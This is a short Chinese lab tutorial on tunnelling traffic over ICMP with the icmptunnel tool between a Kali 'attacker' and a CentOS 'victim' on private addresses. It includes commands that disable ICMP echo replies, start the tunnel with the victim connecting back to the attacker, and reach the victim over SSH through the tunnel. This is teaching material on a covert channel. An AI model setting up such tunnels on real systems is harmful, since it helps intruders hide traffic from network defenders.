本文介绍了如何在kali攻击机和centos受害机之间建立icmp隧道,通过禁用icmp回显,使用icmptunnel进行隐蔽通信。首先在两台机器上安装并禁用icmp回显,然后在攻击机上运行icmptunnel并配置tun0接口,接着在受害机上同样运行icmptunnel并设置相应的tun0接口。最后,通过ssh命令在攻击机上测试连接目标机,成功建立了icmp隧道。
环境搭建:
攻击机kali:192.168.159.129
受害机centos:192.168.159.10
首先我们在攻击机和受害机都需要安装下icmptunnel,并把系统的icmp回显禁用掉,命令如下。
git clone https://github.com/jamesbarlow/icmptunnel.git
cd icmptunnel-master
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
然后我们攻击机运行icmptunnel,简单跟一个s参数即可。运行后会提示打开了一个隧道tun0,我们这时需要再重新开一个命令行,给tun0设置一下ip和子网掩码(使用tun0点对点和目标机通信)。
需要先make进行编译才可执行./icmptunnel -s的命令
ifconfig tun0 10.0.0.1 netmask 255.255.255.0
攻击机设置好后,我们去受害机用icmptunnel跟服务端ip,并把tun0设置一下就可以了。
命令如下:
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all(上面已经禁ICMP了,此处不用再执行此命令)
./icmptunnel 192.168.159.129(使用make编译后执行此命令)
ifconfig tun0 10.0.0.2 netmask 255.255.255.0(此处使用这条命令配置完后,即可看到tun0的网卡)
这时就和目标机建立了一条icmp隧道,这里在攻击机测试,使用shh命令连接目标机。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
